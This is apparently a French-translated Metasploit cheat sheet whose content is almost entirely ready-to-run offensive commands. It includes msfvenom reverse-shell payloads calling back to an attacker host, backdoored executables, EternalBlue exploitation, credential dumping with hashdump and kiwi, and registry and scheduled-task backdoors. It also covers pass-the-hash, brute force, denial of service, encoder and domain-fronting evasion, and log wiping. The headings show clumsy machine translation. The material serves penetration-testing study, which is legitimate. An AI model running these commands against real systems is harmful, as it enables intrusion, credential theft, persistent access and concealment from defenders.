Aller au contenu

Métasploit cadre feuille de chaleur

Copier toutes les commandes Générer PDF

Aperçu général

Le Cadre Metasploit est le cadre de test de pénétration le plus utilisé au monde, développé par Rapid7. Créé à l'origine par H.D. Moore en 2003, Metasploit est devenu la norme de facto pour exploiter le développement, la validation de vulnérabilité et les tests de pénétration. Le cadre fournit une plate-forme complète pour développer, tester et exécuter le code d'exploitation contre les machines à distance, ce qui en fait un outil indispensable pour les professionnels de la sécurité, les testeurs de pénétration et les opérateurs d'équipes rouges.

L'architecture modulaire de Metasploit se compose d'exploits, de charges utiles, d'encodeurs, de nops et de modules auxiliaires qui peuvent être combinés de diverses façons pour créer des scénarios d'attaque sophistiqués. Le framework prend en charge plusieurs interfaces, dont la ligne de commande msfconsole, l'interface Web et diverses API pour l'intégration avec d'autres outils de sécurité. Avec plus de 2 000 exploits et 500 charges utiles, Metasploit offre une large couverture pour tester les vulnérabilités de sécurité dans différents systèmes d'exploitation, applications et services réseau.

La force du cadre réside non seulement dans sa vaste base de données d'exploitation, mais aussi dans ses capacités de production de charge utile, ses modules post-exploitation et ses techniques d'évasion. Metasploit permet aux professionnels de la sécurité de simuler des attaques dans le monde réel, de valider les contrôles de sécurité et de démontrer l'impact des vulnérabilités sur les intervenants. Son intégration avec d'autres outils de sécurité et sa documentation étendue le rendent accessible aux débutants et aux praticiens avancés dans le domaine de la cybersécurité.

Installation

Installation de Kali Linux

Metasploit vient pré-installé sur Kali Linux et peut être mis à jour en utilisant le gestionnaire de paquets:

# Update Metasploit on Kali Linux
sudo apt update
sudo apt install metasploit-framework

# Initialize the database
sudo msfdb init

# Start PostgreSQL service
sudo systemctl start postgresql
sudo systemctl enable postgresql

# Verify installation
msfconsole --version

Installation Ubuntu/Debian

# Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Alternative: Manual installation
sudo apt update
sudo apt install curl wget gnupg2 software-properties-common apt-transport-https ca-certificates

# Add Rapid7 GPG key
curl -fsSL https://apt.metasploit.com/metasploit-framework.gpg.key|sudo apt-key add -

# Add repository
echo "deb https://apt.metasploit.com/ lucid main"|sudo tee /etc/apt/sources.list.d/metasploit-framework.list

# Install Metasploit
sudo apt update
sudo apt install metasploit-framework

# Initialize database
sudo msfdb init
```_

### CentOS/RHEL Installation

```bash
# Install dependencies
sudo yum install curl wget which

# Download and run installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

# Initialize database
sudo msfdb init

# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
```_

### Installation Docker

```bash
# Pull official Metasploit image
docker pull metasploitframework/metasploit-framework

# Run Metasploit in Docker
docker run --rm -it -v "$\\\\{HOME\\\\}/.msf4:/home/msf/.msf4" metasploitframework/metasploit-framework

# Run with database persistence
docker run --rm -it -v "$\\\\{HOME\\\\}/.msf4:/home/msf/.msf4" -v "$\\\\{HOME\\\\}/msf-db:/opt/metasploit-framework/embedded/var/lib/postgresql" metasploitframework/metasploit-framework

# Create alias for easy access
echo 'alias msfconsole="docker run --rm -it -v \"$\\\\{HOME\\\\}/.msf4:/home/msf/.msf4\" metasploitframework/metasploit-framework"' >> ~/.bashrc
source ~/.bashrc

Installation de Windows

# Download installer from official website
# https://windows.metasploit.com/metasploitframework-latest.msi

# Install using PowerShell (requires admin privileges)
Start-Process msiexec.exe -Wait -ArgumentList '/I metasploitframework-latest.msi /quiet'

# Verify installation
& "C:\metasploit-framework\bin\msfconsole.bat" --version

# Initialize database (requires PostgreSQL)
& "C:\metasploit-framework\bin\msfdb.bat" init

installation macOS

# Install using Homebrew
brew install metasploit

# Alternative: Download installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Initialize database
msfdb init

# Start PostgreSQL
brew services start postgresql

Utilisation de base

Démarrage de Métasploit Console

# Start msfconsole
msfconsole

# Start with specific database
msfconsole -d msf_database

# Start with custom resource script
msfconsole -r /path/to/script.rc

# Start in quiet mode
msfconsole -q

# Start with specific workspace
msfconsole -w workspace_name

Gestion des bases de données

# Initialize database
msfdb init

# Check database status
msfdb status

# Start database
msfdb start

# Stop database
msfdb stop

# Restart database
msfdb restart

# Delete database
msfdb delete

# Reinitialize database
msfdb reinit

Commandes de Console de base

# Get help
help
?

# Show version information
version

# Exit console
exit
quit

# Clear screen
clear

# Show banner
banner

# Load resource script
resource /path/to/script.rc

# Save command history
history -S /path/to/history.txt

# Load command history
history -L /path/to/history.txt

Commandes de base

Recherche et information

# Search for exploits
search type:exploit platform:windows
search cve:2017-0144
search name:eternal
search rank:excellent

# Search for payloads
search type:payload platform:windows arch:x64
search type:payload platform:linux format:elf

# Search for auxiliary modules
search type:auxiliary name:scanner

# Search for post-exploitation modules
search type:post platform:windows

# Show module information
info exploit/windows/smb/ms17_010_eternalblue
info payload/windows/x64/meterpreter/reverse_tcp

# Show module options
show options
show advanced
show evasion
show targets
show payloads

# Show available exploits
show exploits

# Show available payloads
show payloads

# Show auxiliary modules
show auxiliary

# Show post-exploitation modules
show post

# Show encoders
show encoders

# Show nops
show nops

Sélection et configuration des modules

# Use a module
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/portscan/tcp
use payload/windows/x64/meterpreter/reverse_tcp

# Set module options
set RHOSTS 192.168.1.100
set RHOST 10.0.0.1
set LHOST 192.168.1.50
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Set global options
setg RHOSTS 192.168.1.0/24
setg LHOST 192.168.1.50

# Unset options
unset RHOSTS
unset PAYLOAD

# Unset global options
unsetg RHOSTS

# Show current settings
show options
show advanced

# Get option information
info -d RHOSTS

# Set advanced options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate

Gestion des objectifs et de la charge utile

# Show available targets
show targets

# Set specific target
set TARGET 0
set TARGET "Windows 7 SP1 x64"

# Show compatible payloads
show payloads

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/shell/reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp

# Generate payload
generate -f exe -o payload.exe
generate -f elf -o payload.elf
generate -f war -o payload.war

# Show payload options
show options

# Set payload options
set LHOST 192.168.1.50
set LPORT 4444
set EXITFUNC thread

Exploitation Flux de travail

Processus d'exploitation de base

# 1. Search for exploit
search ms17-010

# 2. Use exploit module
use exploit/windows/smb/ms17_010_eternalblue

# 3. Show and set options
show options
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50

# 4. Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4444

# 5. Check if target is vulnerable
check

# 6. Run the exploit
exploit
run

# 7. Interact with session
sessions -l
sessions -i 1

Techniques d'exploitation avancées

# Use specific target
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j

# Exploit with specific options
exploit -z  # Don't interact with session
exploit -j  # Run as job
exploit -J  # Force running in foreground

# Set advanced evasion options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate

# Use encoders for evasion
set ENCODER x86/shikata_ga_nai
set ITERATIONS 3

# Set custom user agent
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Use custom templates
set TEMPLATE /path/to/template.exe

Exploitation multicibles

# Set multiple targets
set RHOSTS 192.168.1.100-110
set RHOSTS file:/path/to/targets.txt
set RHOSTS 192.168.1.0/24

# Use threading for faster exploitation
set THREADS 10

# Run exploit against all targets
exploit

# Check all targets
check

# Use auxiliary scanner first
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 20
run

Génération de charge utile

MSFVenom Génération de charge utile

# Generate Windows executables
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe

# Generate Linux executables
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o payload.elf

# Generate macOS executables
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho

# Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o payload.apk

# Generate iOS payload
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho

# Generate web payloads
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o payload.war
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o payload.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o payload.asp

Charges utiles codées

# Encode with shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_payload.exe

# Multiple encoding iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o heavily_encoded.exe

# Use different encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/alpha_mixed -f exe -o alpha_encoded.exe

# Chain multiple encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -e x86/alpha_mixed -i 5 -f exe -o multi_encoded.exe

Modèles et formats personnalisés

# Use custom template
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -f exe -o backdoored.exe

# Keep template behavior
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -k -f exe -o backdoored.exe

# Generate shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f c
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f powershell

# Generate different formats
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll -o payload.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f msi -o payload.msi

Charges utiles spécifiques à la plate-forme

# Windows payloads
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/vncinject/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o vnc.exe
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o ps.exe

# Linux payloads
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o bind.elf

# Multi-platform payloads
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f jar -o payload.jar
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f py -o payload.py

Gestion des séances

Commandes de session de base

# List active sessions
sessions

# List sessions with details
sessions -l

# Interact with session
sessions -i 1

# Kill session
sessions -k 1

# Kill all sessions
sessions -K

# Upgrade shell to meterpreter
sessions -u 1

# Run command on session
sessions -c "whoami" -i 1

# Run script on session
sessions -s /path/to/script.rb -i 1

Interactions de séance

# Background current session
background
bg

# Return to session
sessions -i 1

# Run local command
!ls
!pwd
!cat /etc/passwd

# Upload file to session
upload /local/file.txt C:\\Windows\\Temp\\file.txt

# Download file from session
download C:\\Windows\\System32\\drivers\\etc\\hosts /tmp/hosts

# Execute command
execute -f cmd.exe -a "/c whoami"
execute -f powershell.exe -a "-Command Get-Process"

# Get system information
sysinfo
getuid
getpid

Gestion avancée des sessions

# Route traffic through session
route add 10.0.0.0/24 1
route print
route delete 10.0.0.0/24

# Port forwarding
portfwd add -l 8080 -p 80 -r 192.168.1.100
portfwd list
portfwd delete -l 8080

# Pivot through session
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j

# Auto-route through session
use post/multi/manage/autoroute
set SESSION 1
run

Commandes de compteurpreter

Informations sur le système

# Get system information
sysinfo
getuid
getpid
ps

# Get environment variables
getenv
getenv PATH
getenv COMPUTERNAME

# Get network configuration
ipconfig
ifconfig
route

# Get system privileges
getprivs

# Check if running as system
getsystem

# Get current directory
pwd
getwd

# List drives
show_mount

Opérations du système de fichiers

# Navigate file system
cd C:\\Windows
cd /etc
ls
dir

# Search for files
search -f *.txt
search -f config.* -d C:\\
search -f passwd -d /etc

# Download files
download C:\\Windows\\System32\\config\\SAM /tmp/SAM
download /etc/passwd /tmp/passwd

# Upload files
upload /tmp/payload.exe C:\\Windows\\Temp\\payload.exe
upload /tmp/script.sh /tmp/script.sh

# Edit files
edit C:\\Windows\\Temp\\file.txt
edit /tmp/file.txt

# Delete files
rm C:\\Windows\\Temp\\file.txt
del /tmp/file.txt

# Create directories
mkdir C:\\Windows\\Temp\\test
mkdir /tmp/test

Gestion des processus

# List processes
ps

# Get detailed process information
ps -A
ps -S

# Kill process
kill 1234

# Migrate to process
migrate 1234
migrate explorer.exe

# Execute programs
execute -f cmd.exe
execute -f powershell.exe -a "-Command Get-Process"
execute -f /bin/bash -a "-c 'id'"

# Run as different user
execute -f cmd.exe -u username -p password

# Create process
execute -f notepad.exe -H

Opérations réseau

# Show network connections
netstat
netstat -an

# ARP table
arp

# Network interfaces
ipconfig
ifconfig

# Port forwarding
portfwd add -l 3389 -p 3389 -r 192.168.1.100
portfwd list
portfwd delete -l 3389

# Reverse port forwarding
portfwd add -R -l 8080 -p 80 -r 127.0.0.1

# SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j

Opérations du registre (Windows)

# Enumerate registry keys
reg enumkey -k HKLM\\Software
reg enumkey -k HKCU\\Software

# Query registry values
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion -v ProductName
reg queryval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

# Set registry values
reg setval -k HKLM\\Software\\Test -v TestValue -t REG_SZ -d "Test Data"

# Delete registry values
reg deleteval -k HKLM\\Software\\Test -v TestValue

# Delete registry keys
reg deletekey -k HKLM\\Software\\Test

Opérations liées aux titres de créance

# Dump hashes
hashdump

# Load mimikatz
load mimikatz
wdigest
msv
ssp
tspkg
kerberos

# Load kiwi (newer mimikatz)
load kiwi
creds_all
creds_wdigest
creds_msv
creds_ssp
creds_tspkg
creds_kerberos

# Golden ticket
golden_ticket_create -u Administrator -d domain.com -s S-1-5-21-... -k aes256_key

# Silver ticket
kerberos_ticket_use /path/to/ticket.kirbi

Persistance

# Create persistent backdoor
use exploit/windows/local/persistence
set SESSION 1
set STARTUP SYSTEM
run

# Registry persistence
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Backdoor -t REG_SZ -d "C:\\Windows\\Temp\\backdoor.exe"

# Service persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# Scheduled task persistence
execute -f schtasks.exe -a "/create /tn Backdoor /tr C:\\Windows\\Temp\\backdoor.exe /sc onlogon"

Modules post-exploitation

Collecte d'informations

# System enumeration
use post/windows/gather/enum_system
use post/linux/gather/enum_system
set SESSION 1
run

# Network enumeration
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/linux/gather/enum_network
set SESSION 1
run

# Credential gathering
use post/windows/gather/credentials/credential_collector
use post/windows/gather/smart_hashdump
use post/linux/gather/hashdump
set SESSION 1
run

# Application enumeration
use post/windows/gather/enum_applications
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
set SESSION 1
run

# File enumeration
use post/windows/gather/enum_files
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\
set FILE_GLOBS *.txt,*.doc,*.pdf
run

Escalade des privilèges

# Windows privilege escalation
use post/windows/escalate/getsystem
use post/windows/escalate/bypassuac
use post/windows/escalate/bypassuac_injection
set SESSION 1
run

# Linux privilege escalation
use post/linux/escalate/cve_2021_4034
use post/linux/escalate/sudo_baron_samedit
set SESSION 1
run

# Suggest privilege escalation
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# UAC bypass
use exploit/windows/local/bypassuac_comhijack
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
run

Mouvement latéral

# Pass the hash
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.100
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
run

# WMI execution
use exploit/windows/local/wmi
set SESSION 1
set RHOSTS 192.168.1.100
run

# PowerShell remoting
use exploit/windows/local/powershell_remoting
set SESSION 1
set RHOSTS 192.168.1.100
run

# SSH lateral movement
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.0/24
set USERNAME root
set PASSWORD password
run

Exfiltration des données

# File collection
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\Users
set FILE_GLOBS *.doc,*.pdf,*.txt,*.xls
run

# Browser data
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
use post/windows/gather/enum_ie
set SESSION 1
run

# Email data
use post/windows/gather/outlook
use post/windows/gather/thunderbird_creds
set SESSION 1
run

# Database enumeration
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mysql/mysql_enum
set SESSION 1
run

Persistance et portes arrière

# Registry persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
set STARTUP SYSTEM
run

# Service persistence
use post/windows/manage/persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# Scheduled task
use post/windows/manage/schtask
set SESSION 1
set TASKNAME Backdoor
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# WMI persistence
use post/windows/manage/wmi_persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

Modules auxiliaires

Scanners

# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,23,25,53,80,110,443,993,995
set THREADS 20
run

# Service version detection
use auxiliary/scanner/http/http_version
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.0/24
set THREADS 10
run

# SMB enumeration
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 192.168.1.0/24
run

# Web application scanning
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_put
set RHOSTS 192.168.1.100
set THREADS 10
run

Attaques de la force brute

# SSH brute force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set THREADS 10
run

# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

# HTTP basic auth brute force
use auxiliary/scanner/http/http_login
set RHOSTS 192.168.1.100
set AUTH_URI /admin
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

# SMB brute force
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

Refus de service

# TCP SYN flood
use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.100
set RPORT 80
set THREADS 10
run

# HTTP slowloris
use auxiliary/dos/http/slowloris
set RHOST 192.168.1.100
set RPORT 80
run

# SMB DoS
use auxiliary/dos/windows/smb/ms09_001_write
set RHOST 192.168.1.100
run

# WiFi deauth
use auxiliary/dos/wifi/deauth
set INTERFACE wlan0
set BSSID 00:11:22:33:44:55
run

Énumération SNMP

# SNMP community scanner
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
run

# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.100
set COMMUNITY public
run

# SNMP user enumeration
use auxiliary/scanner/snmp/snmp_enumusers
set RHOSTS 192.168.1.100
run

# SNMP process enumeration
use auxiliary/scanner/snmp/snmp_enumprocesses
set RHOSTS 192.168.1.100
run

Intégration des bases de données

Gestion des espaces de travail

# List workspaces
workspace

# Create workspace
workspace -a project_name

# Switch workspace
workspace project_name

# Delete workspace
workspace -d project_name

# Rename workspace
workspace -r old_name new_name

# Show current workspace
workspace -v

Gestion des hôtes et des services

# Add hosts
db_import /path/to/nmap_scan.xml
hosts

# Add host manually
hosts -a 192.168.1.100 -n target1 -o "Windows 10"

# Show hosts
hosts
hosts -c address,name,os_name

# Search hosts
hosts 192.168.1.0/24
hosts -S windows

# Delete hosts
hosts -d 192.168.1.100

# Add services
services -a -p 80 -s http -h 192.168.1.100

# Show services
services
services -p 80
services -s http

# Delete services
services -d -p 80 -h 192.168.1.100

Gestion de la vulnérabilité

# Show vulnerabilities
vulns

# Add vulnerability
vulns -a -h 192.168.1.100 -n "MS17-010" -r "CVE-2017-0144"

# Search vulnerabilities
vulns -S ms17-010

# Show vulnerability details
vulns -v

# Export vulnerabilities
vulns -O /tmp/vulns.xml

Gestion des titres de créance

# Show credentials
creds

# Add credentials
creds -a -h 192.168.1.100 -u administrator -p password123 -t password

# Search credentials
creds -S administrator

# Show credential details
creds -v

# Export credentials
creds -O /tmp/creds.csv

Gestion du butin

# Show loot
loot

# Add loot
loot -a -h 192.168.1.100 -t "password_file" -f /tmp/passwords.txt

# Search loot
loot -S password

# Export loot
loot -O /tmp/loot.xml

Techniques avancées

Développement de modules personnalisés

# Basic exploit module template
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = \\\\{\\\\})
    super(update_info(info,
      'Name'           => 'Custom Exploit',
      'Description'    => 'Custom exploit description',
      'Author'         => ['Your Name'],
      'License'        => MSF_LICENSE,
      'References'     => [['CVE', '2021-1234']],
      'Platform'       => 'win',
      'Targets'        => [['Windows Universal', \\\\{\\\\}]],
      'Payload'        => \\\\{
        'Space'    => 400,
        'BadChars' => "\x00\x0a\x0d"
      \\\\},
      'DisclosureDate' => '2021-01-01',
      'DefaultTarget'  => 0))

    register_options([
      Opt::RPORT(9999)
    ])
  end

  def check
    # Vulnerability check logic
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    # Exploitation logic
    connect
    print_status("Sending payload...")
    sock.put(payload.encoded)
    handler
    disconnect
  end
end

Développement de la charge utile sur mesure

# Basic payload module template
require 'msf/core'

module MetasploitModule
  CachedSize = 200

  include Msf::Payload::Single
  include Msf::Payload::Windows
  include Msf::Payload::Windows::Exec

  def initialize(info = \\\\{\\\\})
    super(merge_info(info,
      'Name'          => 'Custom Windows Payload',
      'Description'   => 'Custom payload description',
      'Author'        => ['Your Name'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86))

    register_options([
      OptString.new('CMD', [true, "Command to execute", 'calc.exe'])
    ])
  end

  def generate
    # Payload generation logic
    cmd = datastore['CMD']||'calc.exe'
    # Return shellcode
  end
end

Techniques d'évacuation

# Use encoders
set ENCODER x86/shikata_ga_nai
set ITERATIONS 5

# Use custom templates
set TEMPLATE /path/to/legitimate.exe

# Modify payload behavior
set PrependMigrate true
set PrependMigrateProc explorer.exe

# Use HTTPS for C2
set LHOST 192.168.1.50
set LPORT 443
set HttpsUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Domain fronting
set HttpHostHeader legitimate-domain.com
set LHOST cdn-provider.com

# Custom user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

# Sleep and jitter
set WfsDelay 30
set Jitter 25

Automatisation et écriture

# Resource scripts
echo "use exploit/multi/handler" > handler.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.50" >> handler.rc
echo "set LPORT 4444" >> handler.rc
echo "exploit -j" >> handler.rc

# Load resource script
msfconsole -r handler.rc

# Ruby scripting
irb
framework = Msf::Simple::Framework.create
session = framework.sessions[1]
session.shell_command("whoami")

# Automation script
#!/usr/bin/env ruby
require 'msf/core'
require 'msf/base'

framework = Msf::Simple::Framework.create
exploit = framework.exploits.create('windows/smb/ms17_010_eternalblue')
exploit.datastore['RHOSTS'] = '192.168.1.100'
exploit.datastore['PAYLOAD'] = 'windows/x64/meterpreter/reverse_tcp'
exploit.datastore['LHOST'] = '192.168.1.50'
exploit.datastore['LPORT'] = '4444'
exploit.exploit_simple('Payload' => exploit.datastore['PAYLOAD'])

Intégration avec d'autres outils

Intégration Nmap

# Import Nmap results
db_import /path/to/nmap_scan.xml

# Use Nmap from within Metasploit
db_nmap -sS -O 192.168.1.0/24
db_nmap -sV -p 1-1000 192.168.1.100

# Automated exploitation based on Nmap results
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# Use discovered services
hosts -c address,name,os_name
services -c port,proto,name,state

Intégration de Burp Suite

# Configure Burp proxy
set Proxies http:127.0.0.1:8080

# Use Burp findings
use auxiliary/scanner/http/dir_scanner
set RHOSTS target.com
set DICTIONARY /path/to/burp_discovered_dirs.txt
run

# Export session for Burp
sessions -l
sessions -C "netstat -an" -i 1 > network_connections.txt

Intégration de la grève du cobalt

# Generate Cobalt Strike compatible payload
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.50 LPORT=80 -f raw|base64

# Use Cobalt Strike beacon
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 80
exploit -j

# Lateral movement coordination
route add 10.0.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j

Intégration OSINT

# Use theHarvester results
use auxiliary/gather/search_email_collector
set DOMAIN target.com
run

# Shodan integration
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_api_key
set QUERY "apache city:\"New York\""
run

# Social engineering
use auxiliary/gather/social_engineering_toolkit
set TARGET_EMAIL admin@target.com
run

Dépannage

Questions et solutions communes

# Database connection issues
msfdb status
msfdb reinit
sudo systemctl restart postgresql

# Module loading errors
reload_all
updatedb

# Payload generation failures
msfvenom --list formats
msfvenom --list encoders
msfvenom --list platforms

# Session connectivity issues
sessions -l
sessions -k 1
route print
route flush

# Permission issues
sudo chown -R $USER:$USER ~/.msf4
sudo chmod -R 755 ~/.msf4

Optimisation des performances

# Increase database performance
echo "shared_buffers = 256MB"|sudo tee -a /etc/postgresql/*/main/postgresql.conf
echo "effective_cache_size = 1GB"|sudo tee -a /etc/postgresql/*/main/postgresql.conf
sudo systemctl restart postgresql

# Optimize threading
set THREADS 20
set MaxSessions 10

# Memory optimization
ulimit -n 4096
echo "* soft nofile 4096"|sudo tee -a /etc/security/limits.conf
echo "* hard nofile 4096"|sudo tee -a /etc/security/limits.conf

# Clean up old sessions
sessions -K
db_rebuild_cache

Déboguement

# Enable verbose output
set VERBOSE true

# Debug mode
msfconsole -L -o /tmp/msf.log

# Ruby debugging
irb
load '/usr/share/metasploit-framework/lib/msf/core.rb'
framework = Msf::Simple::Framework.create

# Module debugging
use exploit/windows/smb/ms17_010_eternalblue
set VERBOSE true
check

Considérations en matière de sécurité

Sécurité opérationnelle

# Use VPN or proxy
set Proxies socks5:127.0.0.1:9050

# Randomize source ports
set CPORT 1024-65535

# Use legitimate user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Implement delays
set WfsDelay 10
set Jitter 25

# Clean up artifacts
rm /tmp/payload.exe
history -c

Considérations juridiques et éthiques

# Document authorization
echo "Authorized penetration test - $(date)" > /tmp/authorization.txt
echo "Scope: 192.168.1.0/24" >> /tmp/authorization.txt
echo "Contact: security@company.com" >> /tmp/authorization.txt

# Limit scope
set RHOSTS 192.168.1.100-110  # Only authorized targets
set ExitOnSession true        # Limit session creation

# Avoid destructive actions
set DisablePayloadHandler true
set PrependMigrate false

Protection des données

# Encrypt database
msfdb stop
sudo -u postgres pg_dump msf > /tmp/msf_backup.sql
gpg -c /tmp/msf_backup.sql
rm /tmp/msf_backup.sql

# Secure communications
set LHOST 192.168.1.50
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai

# Clean up logs
history -c
rm ~/.msf4/logs/*
sudo rm /var/log/postgresql/*

